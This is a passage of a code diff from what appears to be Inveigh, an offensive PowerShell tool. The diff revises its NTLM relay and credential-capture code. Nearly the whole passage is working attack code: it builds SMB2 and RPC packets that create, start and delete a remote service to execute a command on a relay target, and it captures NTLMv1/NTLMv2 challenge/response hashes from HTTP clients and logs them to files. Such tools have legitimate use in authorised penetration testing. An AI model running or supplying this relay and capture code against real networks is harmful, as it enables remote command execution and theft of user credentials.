$SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length) @@ -2457,13 +2501,13 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW_First' { $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index) - $SMB2_message_ID += 20 + $SMB2_message_ID++ $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)] $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length) $SMB_split_index_tracker = $SMB_split_index $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2496,7 +2540,7 @@ $SMB_relay_functions_scriptblock = $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index) $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2525,7 +2569,7 @@ $SMB_relay_functions_scriptblock = $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length] $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2548,8 +2592,8 @@ $SMB_relay_functions_scriptblock = $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service created on $Target") > $null $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute command on $Target") > $null $SMB_service_context_handle = $SMB_client_receive[112..131] - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00 @@ -2569,7 +2613,7 @@ $SMB_relay_functions_scriptblock = } elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00') { - $inveigh.console_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service creation failed on $Target") > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service creation failed on $Target") > $null $SMB_relay_failed = $true } else @@ -2591,8 +2635,8 @@ $SMB_relay_functions_scriptblock = $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service failed to start on $Target") > $null } - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00 @@ -2618,7 +2662,7 @@ $SMB_relay_functions_scriptblock = if($SMB_close_service_handle_stage -eq 1) { $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service deleted on $Target") > $null - $SMB2_message_ID += 20 + $SMB2_message_ID++ $SMB_close_service_handle_stage++ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle } @@ -2629,7 +2673,7 @@ $SMB_relay_functions_scriptblock = $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle } - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data @@ -2647,8 +2691,8 @@ $SMB_relay_functions_scriptblock = 'CloseRequest' { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2CloseRequest $SMB_file_ID $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2663,8 +2707,8 @@ $SMB_relay_functions_scriptblock = 'TreeDisconnect' { - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2689,8 +2733,8 @@ $SMB_relay_functions_scriptblock = 'Logoff' { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2SessionLogoffRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2818,6 +2862,7 @@ $HTTP_scriptblock = $HTTP_running = $true $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint $HTTP_client_close = $true + $process_ID_bytes = Get-ProcessIDArray $relay_step = 0 if($proxy_listener) @@ -2933,7 +2978,7 @@ $HTTP_scriptblock = while($HTTP_stream.DataAvailable) { - $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) + $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) > $null } $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes) @@ -2964,13 +3009,13 @@ $HTTP_scriptblock = if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") > $null if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})) { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") > $null } } @@ -3024,39 +3069,44 @@ $HTTP_scriptblock = if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') { - if($attack -eq 'Session') + if($inveigh.target_list -gt 1) { - $target = $null - ForEach($target_entry in $inveigh.target_list) + if($attack -eq 'Session') { + $target = $null - if(!$target) + ForEach($target_entry in $inveigh.target_list) { - - if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Initiator -eq $HTTP_source_IP -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit) + + if(!$target) { - $target = $target_entry - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") + + if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Initiator -eq $HTTP_source_IP -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit) + { + $target = $target_entry + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null + } + } } - } - - if(!$target -and $SessionPriority -eq 'Y') - { - - ForEach($target_entry in $inveigh.target_list) + if(!$target -and $SessionPriority -eq 'Y') { - if(!$target) + ForEach($target_entry in $inveigh.target_list) { - - if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Privileged -eq 'yes' -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit) + + if(!$target) { - $target = $target_entry - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") + + if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Privileged -eq 'yes' -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit) + { + $target = $target_entry + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null + } + } } @@ -3064,39 +3114,43 @@ $HTTP_scriptblock = } } - - } - else - { - $target = $null - - ForEach($target_entry in $inveigh.target_list) + else { + $target = $null - if(!$target) + ForEach($target_entry in $inveigh.target_list) { - if($HTTP_source_IP -ne $target_entry -and !$inveigh.relay_list.Contains("$HTTP_source_IP $target_entry")) + if(!$target) { - $target = $target_entry + + if($HTTP_source_IP -ne $target_entry -and !$inveigh.relay_list.Contains("$HTTP_source_IP $target_entry")) + { + $target = $target_entry + } + } } - } + if(!$target) + { + $target = $inveigh.target_list[(Get-Random -Maximum $inveigh.target_list.Count)] + } - if(!$target) - { - $target = $inveigh.target_list[(Get-Random -Maximum $inveigh.target_list.Count)] + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null } - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") + } + else + { + $target = $inveigh.target_list[0] } if($inveigh.SMB_relay -and $relay_step -eq 0 -and ($target -and $HTTP_source_IP -ne $target)) { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay initiated by $HTTP_source_IP") - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Grabbing challenge for relay from $target") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay initiated by $HTTP_source_IP") > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Grabbing challenge for relay from $target") > $null $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient $SMB_relay_socket.Client.ReceiveTimeout = 60000 $SMB_relay_socket.Connect($Target,"445") @@ -3105,13 +3159,13 @@ $HTTP_scriptblock = if(!$SMB_relay_socket.connected) { - $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding") + $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding") > $null $relay_step = 0 } if($relay_step -eq 1) { - $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version + $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version $process_ID_bytes if($SMB_relay_bytes.Length -le 3) { @@ -3155,9 +3209,9 @@ $HTTP_scriptblock = $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) $NTLM = 'NTLM ' + $NTLM_challenge_base64 $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes - $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge) - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Received challenge $NTLM_challenge for relay from $Target") - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Providing challenge $NTLM_challenge for relay to $HTTP_source_IP") + $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge) > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Received challenge $NTLM_challenge for relay from $Target") > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Providing challenge $NTLM_challenge for relay to $HTTP_source_IP") > $null $relay_step = 2 } else @@ -3171,11 +3225,11 @@ $HTTP_scriptblock = if(!$target) { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted due to lack of an eligible target") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted due to lack of an eligible target") > $null } elseif($HTTP_source_IP -ne $Target) { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted relay due to initiator matching $target") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted relay due to initiator matching $target") > $null } $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port @@ -3194,7 +3248,7 @@ $HTTP_scriptblock = if($HTTP_NTLM_domain_length -eq 0) { - $HTTP_NTLM_domain_string = '' + $HTTP_NTLM_domain_string = "" } else { @@ -3204,13 +3258,13 @@ $HTTP_scriptblock = $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes - if($HTTP_NTLM_user_length -gt 0) + if($HTTP_NTLM_user_length -eq 0) { - $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes + $HTTP_NTLM_user_string = "" } else { - $HTTP_NTLM_user_string = "" + $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes } $HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string @@ -3227,21 +3281,21 @@ $HTTP_scriptblock = if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { - $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) + $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")) { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))) { $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file) + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file) > $null } if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full") @@ -3261,26 +3315,26 @@ $HTTP_scriptblock = if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { - $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) + $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")) { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique") + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))) { - $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) + $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null } if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full") { - $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") + $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null } } @@ -3306,8 +3360,8 @@ $HTTP_scriptblock = if(($inveigh.session_list | Where-Object {$_.User -eq $HTTP_username_full -and $_.Target -eq $target -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit) { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target") - $SMB_relay_failed = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target") > $null + $SMB_relay_failed = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes if(!$SMB_relay_failed) { @@ -3318,7 +3372,7 @@ $HTTP_scriptblock = $inveigh.session_table[$inveigh.session_count] = $SMB_session_ID $inveigh.session_message_ID_table[$inveigh.session_count] = 3 $inveigh.session_lock_table[$inveigh.session_count] = 'open' - $session_privilege = SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID + $session_privilege = SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes $session_object = New-Object PSObject Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $inveigh.session_count Add-Member -InputObject $session_object -MemberType NoteProperty -Name Target $SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString @@ -3347,12 +3401,12 @@ $HTTP_scriptblock = Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Established" $(Get-Date -format s) Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $(Get-Date -format s) $inveigh.session_list += $session_object - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sesion $($inveigh.session_count) added to session list") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sesion $($inveigh.session_count) added to session list") > $null $inveigh.session_count++ } else { - SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID + SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes } } @@ -3362,7 +3416,7 @@ $HTTP_scriptblock = } else { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has reached session limit on $Target") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has reached session limit on $Target") > $null $SMB_relay_socket.Close() $relay_step = 0 } @@ -3370,7 +3424,7 @@ $HTTP_scriptblock = } else { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target") > $null $SMB_relay_socket.Close() $relay_step = 0 } @@ -3378,7 +3432,7 @@ $HTTP_scriptblock = } else { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Aborting relay since $HTTP_NTLM_user_string appears to be a machine account") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Aborting relay since $HTTP_NTLM_user_string appears to be a machine account") > $null $SMB_relay_socket.Close() $relay_step = 0 } @@ -3386,7 +3440,7 @@ $HTTP_scriptblock = } else { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full not on relay username list") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full not on relay username list") > $null $SMB_relay_socket.Close() $relay_step = 0 } @@ -3506,6 +3560,7 @@ $control_relay_scriptblock = function SigningCheck { + $process_ID_bytes = Get-ProcessIDArray $target_list = $inveigh.target_list ForEach($target_entry in $target_list) @@ -3520,7 +3575,7 @@ $control_relay_scriptblock = } else { - SMBRelayChallenge $SMB_relay_socket $null '$SMB1' $true > $null + SMBRelayChallenge $SMB_relay_socket $null '$SMB1' $true $process_ID_bytes > $null } } @@ -3535,13 +3590,9 @@ $control_relay_scriptblock = function OutputQueueLoop { - while($inveigh.output_queue.Count -gt 0) + while($inveigh.output_queue.Count -gt 0 -and $inveigh.output_pause) { - - if($inveigh.console_output) - { - $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null - } + $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null if($inveigh.file_output) { @@ -3649,27 +3700,6 @@ $control_relay_scriptblock = while($inveigh.relay_running) { - - while($inveigh.output_queue.Count -gt 0) - { - - if($inveigh.console_output) - { - $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null - } - - if($inveigh.file_output) - { - $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null - } - - if($inveigh.log_output) - { - $inveigh.log.Add($inveigh.output_queue[0]) > $null - } - - $inveigh.output_queue.RemoveAt(0) - } if($RelayAutoExit -eq 'Y' -and !$inveigh.SMB_relay) { @@ -3732,6 +3762,7 @@ $control_relay_scriptblock = } + OutputQueueLoop Start-Sleep -m 5 } @@ -3742,6 +3773,8 @@ $session_refresh_scriptblock = { param ($SessionRefresh) + $process_ID_bytes = Get-ProcessIDArray + while($inveigh.relay_running) { @@ -3762,12 +3795,9 @@ $session_refresh_scriptblock = $SMB2_message_ID = $inveigh.session_message_ID_table[$session] $SMB2_tree_ID = 0x00,0x00,0x00,0x00 $SMB_client_receive = New-Object System.Byte[] 1024 - $SMB_path = "\\" + $inveigh.session_socket_table[$session].Client.RemoteEndpoint.Address.IPaddressToString + "\IPC$" - $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path) $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - #$packet_SMB2_header["ProcessID"] = $process_ID_bytes - $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x0D,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_data = New-PacketSMB2Echo $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length @@ -3782,7 +3812,7 @@ $session_refresh_scriptblock = } catch { - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed") + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed") > $null } $inveigh.session_lock_table[$Session] = 'open' @@ -3791,12 +3821,12 @@ $session_refresh_scriptblock = } $session++ + Start-Sleep -s 1 } - - + } - Start-Sleep -m 5 + Start-Sleep -s 1 } } @@ -4358,6 +4388,9 @@ Get captured POST requests. .PARAMETER POSTRequestUnique Get unique captured POST request. + +.PARAMETER Session +Get relay session list. #> [CmdletBinding()] diff --git a/Inveigh.ps1 b/Inveigh.ps1 index 0ab78a1..5a8a791 100644 --- a/Inveigh.ps1 +++ b/Inveigh.ps1 @@ -484,13 +484,11 @@ if(!$inveigh) $inveigh.requested_host_list = New-Object System.Collections.ArrayList $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList $inveigh.DNS_list = New-Object System.Collections.ArrayList + $inveigh.session_list = @() $inveigh.session_socket_table = [HashTable]::Synchronized(@{}) $inveigh.session_table = [HashTable]::Synchronized(@{}) $inveigh.session_message_ID_table = [HashTable]::Synchronized(@{}) - $inveigh.session_user_table = [HashTable]::Synchronized(@{}) - $inveigh.session_timestamp_table = [HashTable]::Synchronized(@{}) $inveigh.session_lock_table = [HashTable]::Synchronized(@{}) - $inveigh.session_privilege_table = [HashTable]::Synchronized(@{}) $inveigh.session_count = 0 } @@ -691,6 +689,11 @@ else $inveigh.newline = "" } +if($inveigh.relay_running) +{ + $inveigh.output_pause = $true +} + # Write startup messages $inveigh.output_queue.Add("[*] Inveigh $inveigh_version started at $(Get-Date -format s)") > $null @@ -1342,6 +1345,11 @@ while($inveigh.output_queue.Count -gt 0) } +if($inveigh.relay_running) +{ + $inveigh.output_pause = $false +} + # Begin ScriptBlocks # Shared Basic Functions ScriptBlock @@ -1588,7 +1596,7 @@ $SMB_NTLM_functions_scriptblock = } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from 